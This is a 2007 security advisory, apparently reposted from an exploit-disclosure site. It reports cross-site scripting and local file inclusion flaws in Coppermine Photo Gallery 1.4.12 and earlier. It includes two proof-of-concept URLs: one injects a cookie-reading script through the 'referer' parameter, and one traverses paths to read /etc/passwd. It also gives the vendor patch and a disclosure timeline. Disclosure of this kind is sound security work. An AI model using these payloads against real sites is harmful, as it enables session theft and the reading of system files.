Coppermine <= 1.4.12 Cross Site Scripting and Local File Inclusion

2007.09.19
Credit: L4teral
Risk: High
Local: No
Remote: Yes
CWE: CWE-79

============================================================ Coppermine <= 1.4.12 Cross Site Scripting and Local File Inclusion ============================================================ Author: L4teral <l4teral [4t] gmail com> Impact: Cross Site Scripting/Local File Inclusion Status: patch available ------------------------------ Affected software description: ------------------------------ Application: Coppermine Photo Gallery Version: <= 1.4.12 Vendor: http://coppermine-gallery.net Description: Coppermine is a multi-purpose fully-featured and integrated web picture gallery script written in PHP using GD or ImageMagick as image library with a MySQL backend. ---------------- Vulnerabilities: ---------------- The script mode.php does not properly sanitize the "referer" parameter. The script viewlog.php does not properly sanitize the "log" parameter. ------------ Poc/Exploit: ------------ http://localhost/cpg/mode.php?admin_mode=1&referer=javascript:alert(docu ment.cookie) http://localhost/cpg/viewlog.php?log=../../../../../../../../../etc/pass wd%00 (should need admin privileges) --------- Solution: --------- update to 1.4.13 or above --------- Timeline: --------- 03.09.2007 - vendor informed 14.09.2007 - patch released by vendor 17.09.2007 - public disclosure


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top